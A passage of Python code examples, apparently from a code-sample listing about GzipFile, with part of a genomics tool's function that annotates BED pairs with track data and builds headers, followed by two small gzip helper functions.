    tracks = list(track)
    ucsc_tracks = list(ucsc_track)
    actions = tuple([a.lower() for a in actions])
    if len(homology_cutoffs) > 0:
        homology_cutoffs = list(homology_cutoffs)
    else:
        homology_cutoffs = [1.0]

    # Parse file with lists of tracks (if provided) and add to track lists
    if track_list is not None:
        supp_tracks, supp_actions, supp_names = mutrate.parse_track_file(
            track_list)
        tracks = tracks + supp_tracks
        n_ucsc_tracks = len(ucsc_tracks)
        if n_ucsc_tracks > 0:
            actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions \
                            + list(actions[n_ucsc_tracks:]))
            track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names \
                            + list(track_names[n_ucsc_tracks:]))
        else:
            actions = tuple(list(actions) + supp_actions)
            track_names = tuple(list(track_names) + supp_names)

    # Parse file with list of UCSC tracks (if provided) and add to track lists
    if ucsc_list is not None:
        supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = mutrate.parse_track_file(
            ucsc_list)
        ucsc_tracks = ucsc_tracks + supp_ucsc_tracks
        actions = tuple(list(actions) + supp_ucsc_actions)
        track_names = tuple(list(track_names) + supp_ucsc_names)

    # Handle header reformatting
    if 'compressed' in determine_filetype(pairs):
        header = GzipFile(pairs).readline().decode('utf-8').rstrip()
    else:
        header = open(pairs, 'r').readline().rstrip()
    if not header.startswith('#'):
        status_msg = '[{0}] athena annotate-pairs: No header line detected. ' + \
                     'Adding default header.'
        print(status_msg.format(
            datetime.now().strftime('%b %d %Y @ %H:%M:%S')))
        n_extra_cols = len(header.split('\t')) - 3
        header = make_default_bed_header(n_extra_cols)
    if len(track_names) > 0:
        newheader = header + '\t' + '\t'.join(list(track_names))
    else:
        newheader = header
    if fasta is not None:
        for k in homology_cutoffs:
            for direction in 'fwd rev'.split():
                newheader += '\t' + 'longest_{}_kmer_{}pct_identity'.format(
                    direction, int(round(100 * k)))

    # Annotate pairs
    newpairs = mutrate.annotate_pairs(pairs, chroms, ranges, tracks,
                                      ucsc_tracks, actions, track_names,
                                      ucsc_ref, fasta, binsize,
                                      homology_cutoffs, ucsc_chromsplit,
                                      maxfloat, quiet)

    # Save annotated pairs
    if 'compressed' in determine_filetype(outfile):
        outfile = path.splitext(outfile)[0]
    newpairs.saveas(outfile, trackline=newheader)

    # Bgzip pairs, if optioned
    if bgzip:
        bgz(outfile)
Example #29
def compress_string(s):
    zbuf = BytesIO()
    zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf)
    zfile.write(s)
    zfile.close()
    return zbuf.getvalue()
Example #30
def open_file(fname):
    if fname.endswith('.gz'):
        return GzipFile(fname)
    else:
        return open(fname)